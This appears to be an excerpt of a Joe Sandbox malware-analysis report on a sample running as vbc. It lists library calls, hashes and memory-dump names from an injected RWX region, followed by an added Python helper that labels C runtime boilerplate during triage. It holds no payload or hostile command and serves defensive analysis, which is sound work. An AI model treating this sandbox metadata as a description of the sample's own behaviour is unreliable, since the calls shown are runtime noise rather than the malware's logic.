                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$__filbuf__fileno
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2631233692-0
                                                                                                                                                                      • Opcode ID: cfdfca61e8346366d06349e67fcb671145d18b2bdf778b4aba29dc3d0bc76d03
                                                                                                                                                                      • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                      • Opcode Fuzzy Hash: cfdfca61e8346366d06349e67fcb671145d18b2bdf778b4aba29dc3d0bc76d03
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000008,?,?,00D515D8,00D53CBB,?,00D51D2A,?,?,00000000), ref: 00D518E4
                                                                                                                                                                      • _free.LIBCMT ref: 00D51919
                                                                                                                                                                      • _free.LIBCMT ref: 00D51940
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00D51D2A,?,?,00000000), ref: 00D5194D
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00D51D2A,?,?,00000000), ref: 00D51956
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                      • Opcode ID: cb9d2af8c9f28d0371731f92727597ba473bb0e94511987602d5e00e0e1c2d70
                                                                                                                                                                      • Instruction ID: e713aa662d1571948051dbd7df58d7530999c5fbbf09bfe59712845c7c0e0bd1
                                                                                                                                                                      • Opcode Fuzzy Hash: cb9d2af8c9f28d0371731f92727597ba473bb0e94511987602d5e00e0e1c2d70
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E01D13E2057116B9F1267786C99B3A165DDBC6377B290125FD25E2292FA62CC0E4C31
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 00D53189
                                                                                                                                                                        • Part of subcall function 00D52096: HeapFree.KERNEL32(00000000,00000000,?,00D53208,?,00000000,?,00000000,?,00D5322F,?,00000007,?,?,00D52697,?), ref: 00D520AC
                                                                                                                                                                        • Part of subcall function 00D52096: GetLastError.KERNEL32(?,?,00D53208,?,00000000,?,00000000,?,00D5322F,?,00000007,?,?,00D52697,?,?), ref: 00D520BE
                                                                                                                                                                      • _free.LIBCMT ref: 00D5319B
                                                                                                                                                                      • _free.LIBCMT ref: 00D531AD
                                                                                                                                                                      • _free.LIBCMT ref: 00D531BF
                                                                                                                                                                      • _free.LIBCMT ref: 00D531D1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: ed9cc85b6dfdaa0ce1b920b348cd2dc7aa0774a2a57ba69e0d49d759ad6b6844
                                                                                                                                                                      • Instruction ID: 9eeae7416862dacb5395e81e2b7960ab73f866e28ccc73904d19ca1733ccacf8
                                                                                                                                                                      • Opcode Fuzzy Hash: ed9cc85b6dfdaa0ce1b920b348cd2dc7aa0774a2a57ba69e0d49d759ad6b6844
                                                                                                                                                                      • Instruction Fuzzy Hash: 13F01D72605700AB8E34EB78F986C2A77D9FA057567680809FD4DD7681DB30FD888AB4
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _fseek_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 208892515-0
                                                                                                                                                                      • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                      • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                      • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                      • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __fileno__flsbuf__flush__locking
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2259706978-0
                                                                                                                                                                      • Opcode ID: 1f130242422820d6b56c00bacb6d27fe4196c5af8236d3277c2b4106ec58e935
                                                                                                                                                                      • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f130242422820d6b56c00bacb6d27fe4196c5af8236d3277c2b4106ec58e935
                                                                                                                                                                      • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00D5354C
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D535D5
                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00D535E7
                                                                                                                                                                      • __freea.LIBCMT ref: 00D535F0
                                                                                                                                                                        • Part of subcall function 00D532FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00D5332C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                                      • Opcode ID: a65efded8fe7990546a89360bbcec618cf25ea541e76dcc50e1569cbc99b3a11
                                                                                                                                                                      • Instruction ID: c751427d496c836acc4bf2048e54e430d6d76026098d346969cb18b41deb796e
                                                                                                                                                                      • Opcode Fuzzy Hash: a65efded8fe7990546a89360bbcec618cf25ea541e76dcc50e1569cbc99b3a11
                                                                                                                                                                      • Instruction Fuzzy Hash: A231BE72A0021AABDF259F64DC45DAE7BA5EF40352F094269FC04D7250EB35CE98CBB0
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D515D8,00000000,00000000,?,00D52132,00D515D8,00000000,00000000,00000000,?,00D52283,00000006,FlsSetValue), ref: 00D521BD
                                                                                                                                                                      • GetLastError.KERNEL32(?,00D52132,00D515D8,00000000,00000000,00000000,?,00D52283,00000006,FlsSetValue,00D66FC4,FlsSetValue,00000000,00000364,?,00D5192D), ref: 00D521C9
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D52132,00D515D8,00000000,00000000,00000000,?,00D52283,00000006,FlsSetValue,00D66FC4,FlsSetValue,00000000), ref: 00D521D7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                      • Opcode ID: da5077a97ee0fa8db826cbf19b2d2c4dee961be2dc53d3b266ec444967aa25da
                                                                                                                                                                      • Instruction ID: b492f2de31a09033412d4abc1b4813e6a8635cd1824cbcf442aed1436be058a7
                                                                                                                                                                      • Opcode Fuzzy Hash: da5077a97ee0fa8db826cbf19b2d2c4dee961be2dc53d3b266ec444967aa25da
                                                                                                                                                                      • Instruction Fuzzy Hash: 1201A776641B32ABCF214A79EC44E777B98AF47BA3B250620FE55D7240D720D909C6F0
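The two entries above at 00D521BD and 00D5354C show call sequences that the Universal CRT emits for its own housekeeping rather than anything specific to this sample. LoadLibraryExW with flags 0x800 (LOAD_LIBRARY_SEARCH_SYSTEM32), then GetLastError, then LoadLibraryExW again with flags 0 is the CRT's loader for its kernel32 thunks such as FlsSetValue (the string operand visible in the call arguments); it retries without the search flag when an older Windows rejects it with ERROR_INVALID_PARAMETER. Two MultiByteToWideChar calls followed by GetStringTypeW and __freea (with RtlAllocateHeap in the subcall) is its GetStringTypeA wrapper. In a private, non-PE-backed RWX region such as 00D10000 this tells the analyst that the region holds a complete statically linked native module, and that these particular functions are runtime noise to skip when looking for the loader's own logic. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses the report's "Api.Module(args), ref: addr" lines (the embedded sample text is copied from the two entries), decodes the LoadLibraryExW flags word, and labels both sequences. The flag values are the documented libloaderapi.h constants; the sequence matching is a triage heuristic chosen here, not a Joe Sandbox signature.

```python
"""Triage helper for the 'APIs' list of a Joe Sandbox function entry (added example,
not part of the report): parses the call lines, decodes LoadLibraryExW flags, labels CRT code."""
import re
from dataclasses import dataclass
from typing import List, Optional

# LoadLibraryEx* flag bits, documented values from libloaderapi.h.
LOAD_LIBRARY_FLAGS = {
    0x0002: "LOAD_LIBRARY_AS_DATAFILE",
    0x0008: "LOAD_WITH_ALTERED_SEARCH_PATH",
    0x0100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR",
    0x0200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR",
    0x0400: "LOAD_LIBRARY_SEARCH_USER_DIRS",
    0x0800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
    0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
    0x2000: "LOAD_LIBRARY_SAFE_CURRENT_DIRS",
}

# Constructed inputs: the API lines of the two report entries, in the report's own layout.
SAMPLE_LOADLIB = """\
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D515D8,00000000,00000000,?,00D52132,00D515D8,00000000,00000000,00000000,?,00D52283,00000006,FlsSetValue), ref: 00D521BD
• GetLastError.KERNEL32(?,00D52132,00D515D8,00000000,00000000,00000000,?,00D52283,00000006,FlsSetValue,00D66FC4,FlsSetValue,00000000,00000364,?,00D5192D), ref: 00D521C9
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D52132,00D515D8,00000000,00000000,00000000,?,00D52283,00000006,FlsSetValue,00D66FC4,FlsSetValue,00000000), ref: 00D521D7
"""
SAMPLE_GETSTRINGTYPE = """\
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00D5354C
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D535D5
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00D535E7
• __freea.LIBCMT ref: 00D535F0
  • Part of subcall function 00D532FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00D5332C
"""

_LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list                        # hex words as int, '?' as None, literals as str
    ref: int                          # call-site address from the "ref:" field
    subcall_of: Optional[int] = None  # set for "Part of subcall function X" lines

def _parse_arg(tok: str):
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok  # a string operand such as FlsSetValue

def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        m = _LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = m["args"]
        calls.append(ApiCall(
            api=m["api"], module=m["module"],
            args=[_parse_arg(a) for a in args.split(",")] if args is not None else [],
            ref=int(m["ref"], 16),
            subcall_of=int(m["caller"], 16) if m["caller"] else None))
    return calls

def decode_load_library_flags(value: int) -> List[str]:
    names = [n for bit, n in sorted(LOAD_LIBRARY_FLAGS.items()) if value & bit]
    leftover = value & ~sum(LOAD_LIBRARY_FLAGS)
    if leftover:
        names.append(f"UNKNOWN(0x{leftover:X})")
    return names

def find_crt_lazy_load_pattern(calls: List[ApiCall]) -> List[int]:
    """Call sites of LoadLibraryExW(.., LOAD_LIBRARY_SEARCH_SYSTEM32) followed by GetLastError
    and a retry with flags 0: the UCRT's system-DLL loader with its ERROR_INVALID_PARAMETER fallback."""
    hits = []
    for a, b, c in zip(calls, calls[1:], calls[2:]):
        if (a.api == "LoadLibraryExW" and len(a.args) > 2 and a.args[2] == 0x0800
                and b.api == "GetLastError"
                and c.api == "LoadLibraryExW" and len(c.args) > 2 and c.args[2] == 0):
            hits.append(a.ref)
    return hits

def classify(calls: List[ApiCall]) -> List[str]:
    """Label sequences that are CRT boilerplate rather than sample-specific code."""
    labels = []
    top = tuple(c.api for c in calls if c.subcall_of is None)
    if find_crt_lazy_load_pattern(calls):
        labels.append("UCRT LoadLibraryExW with SEARCH_SYSTEM32 fallback")
    if top == ("MultiByteToWideChar", "MultiByteToWideChar", "GetStringTypeW", "__freea"):
        labels.append("UCRT GetStringTypeA wrapper (MBCS to UTF-16, then GetStringTypeW)")
    return labels
```

Running `classify(parse_api_lines(SAMPLE_LOADLIB))` labels the 00D521BD entry as the CRT loader, and `decode_load_library_flags(0x800)` names the flag; the 0x800 versus 0 pair is what distinguishes this benign retry from a loader that deliberately passes flags 0 to pick up a DLL from the application directory.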